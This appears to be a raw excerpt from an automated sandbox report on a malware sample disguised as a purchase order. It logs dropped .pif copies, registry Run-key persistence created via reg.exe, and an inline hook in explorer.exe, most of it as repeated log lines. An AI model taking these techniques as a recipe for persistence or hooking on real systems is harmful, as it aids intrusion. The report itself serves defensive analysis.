Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Jump to dropped file

Uses cmd line tools excessively to alter registry or file data

Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe

Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif.pif	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Jump to dropped file

Boot Survival

Creates multiple autostart registry keys

Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PURCHASED ORDER OF ENG091.pif.pif.pif.pif
Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PURCHASED ORDER OF ENG091.pif.pif.pif
Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PURCHASED ORDER OF ENG091	Jump to behavior
Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PURCHASED ORDER OF ENG091.pif.pif
Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PURCHASED ORDER OF ENG091.pif

Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PURCHASED ORDER OF ENG091	Jump to behavior
Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PURCHASED ORDER OF ENG091	Jump to behavior
Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PURCHASED ORDER OF ENG091.pif
Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PURCHASED ORDER OF ENG091.pif
Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PURCHASED ORDER OF ENG091.pif.pif
Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PURCHASED ORDER OF ENG091.pif.pif
Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PURCHASED ORDER OF ENG091.pif.pif.pif
Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PURCHASED ORDER OF ENG091.pif.pif.pif
Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PURCHASED ORDER OF ENG091.pif.pif.pif.pif
Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PURCHASED ORDER OF ENG091.pif.pif.pif.pif

Hooking and other Techniques for Hiding and Protection

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x80 0x0E 0xE5

Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Process information set: NOOPENFILEERRORBOX
